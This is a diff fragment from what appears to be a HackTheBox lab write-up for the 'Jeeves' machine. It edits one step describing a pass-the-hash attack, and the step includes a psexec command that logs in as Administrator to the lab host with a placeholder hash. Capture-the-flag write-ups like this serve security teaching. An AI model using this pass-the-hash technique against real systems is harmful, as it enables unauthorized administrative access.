kvlx-alt/HackTheBox-Writeups/Jeeves.md

    ```

 8. **Using psexec for Access:**
-   - Exploit the pass-the-hash vulnerability with `psexec` to gain access as the Administrator.
+   - Exploit the pass the hash vulnerability with `psexec` to gain access as the Administrator.
    ```bash
    psexec WORKGROUP/Administrator@10.10.10.63 -hashes :hash
    ```